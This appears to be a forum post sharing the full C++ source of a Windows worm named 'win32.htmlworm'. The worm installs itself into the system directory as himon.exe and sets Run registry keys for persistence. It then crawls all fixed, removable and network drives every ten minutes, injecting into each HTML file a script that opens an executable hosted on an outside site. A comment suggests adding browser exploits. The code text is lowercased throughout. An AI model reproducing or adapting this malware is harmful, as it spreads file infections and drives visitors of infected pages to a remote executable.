HTML Worm C++ Source Code
Code:
html worm
// name: win32.htmlworm
// author: wargame
// compiler: borland c++
// description: this worm spreads by adding a link to itself in html files
// improvements: you could add a link to a page containing an ie exploits
#include <windows.h>
#include <string>
using namespace std; //
// this function does the real work
void htmlspread(char *htmlfile)
{
handle html_fd;
dword html_filesize,read_bytes,written_bytes;
char *c_htmlcode = null;
string *htmlcode = null; // make it simpler
long pos;
// open the html file
html_fd = createfile(htmlfile,generic_read|generic_write,
file_share_read|file_share_write,null,open_existing,file_attribute_normal,null);
if(html_fd == invalid_handle_value)
{
return;
}
// get file size
html_filesize = getfilesize(html_fd,null);
// allocate enough memory
c_htmlcode = (char *)malloc(html_filesize);
if(c_htmlcode == null)
{
return;
}
// read entire file
if(readfile(html_fd,c_htmlcode,html_filesize,&read_bytes,null) == 0)
{
closehandle(html_fd);
return;
}
// create a string object
htmlcode = new string(c_htmlcode);
free(c_htmlcode);
// already infected ?
if(htmlcode->find("<!-- htmlworm by [wargame,#eof] !-->") == string::npos)
{
pos = htmlcode->find("</body>");
if(pos == string::npos)
{
pos = htmlcode->find("</body>");
if(pos == string::npos)
{
closehandle(html_fd);
delete htmlcode;
return;
}
}
// add link
htmlcode->replace(pos,7,"\r\n<script language=\"javascript\">window.open('http://hexter.host.sk/artwork.exe')</script>\r\n</body>");
// write new file
setfilepointer(html_fd,0,0,file_begin);
writefile(html_fd,htmlcode->c_str(),htmlcode->size(),&written_bytes,null);
// infection mark
writefile(html_fd,"<!-- htmlworm by [wargame,#eof] !-->",36,&written_bytes,null);
}
// close all
closehandle(html_fd);
delete htmlcode;
}
// add worm to startup list
void autostart(char *my_path)
{
hkey hkey;
if(regopenkeyex(hkey_local_machine,
"software\\microsoft\\windows\\currentversion\\run",0,
key_write,&hkey)==error_success)
{
regsetvalueex(hkey,"himon",0,reg_sz,my_path,strlen(my_path));
regclosekey(hkey);
}
if(regopenkeyex(hkey_current_user,
"software\\microsoft\\windows\\currentversion\\run",0,
key_write,&hkey)==error_success)
{
regsetvalueex(hkey,"himon",0,reg_sz,my_path,strlen(my_path));
regclosekey(hkey);
}
}
// this will scan drives for html files
void s3arch(char *pt) {
char sc[max_path],buf[max_path];
win32_find_data in;
handle fd,file;
char *fm = "%s\\%s",*fm1 = "%s\\*.*";
if(strlen(pt) == 3)
{
pt[2] = '\0'; /* :-) */
}
sprintf(sc,fm1,pt);
fd = findfirstfile(sc,&in);
do
{
sprintf(buf,fm,pt,in.cfilename);
/* dot */
if(strcmp(in.cfilename,"..") != 0 && strcmp(in.cfilename,".") != 0 && (in.dwfileattributes & file_attribute_directory))
{
s3arch(buf);
}
/* file found */
else
{
/* is it good to infect ? */
if(strstr(in.cfilename,".html") || strstr(in.cfilename,".htm"))
{
htmlspread(buf);
}
}
}while(findnextfile(fd,&in));
findclose(fd);
}
// entry point of worm
int winapi winmain (hinstance hinstance, hinstance hprevinstance, lpstr lpcmdline, int ncmdshow)
{
// usual shit: installation part, startup and so on ...
char i_am_here[max_path],installation_path[max_path];
char drives[3],drive = 0;
uint drive_type;
// only one copy
createmutex(null,false,"__htmlworm_by_wargame_eof__");
if(getlasterror() == error_already_exists)
{
exitprocess(0);
}
getsystemdirectory(installation_path,max_path);
strcat(installation_path,"\\himon.exe");
getmodulefilename(null,i_am_here,max_path);
// copy!
copyfile(i_am_here,installation_path,false);
autostart(installation_path);
// the real part starts here
while(1)
{
/* search for drives */
for(drive = 'c';drive <= 'z';drive++)
{
drives[0] = drive;
drives[1] = ':';
drives[2] = '\\';
drives[3] = '\0';
/* drive ? */
drive_type = getdrivetype(drives);
/* only fixed, remote and removable drives */
if(drive_type == drive_fixed ||
drive_type == drive_remote ||
drive_type == drive_removable)
{
/* go! */
s3arch(drives);
}
}
/* every 10 minutes */
sleep((1000*60)*10);
}
}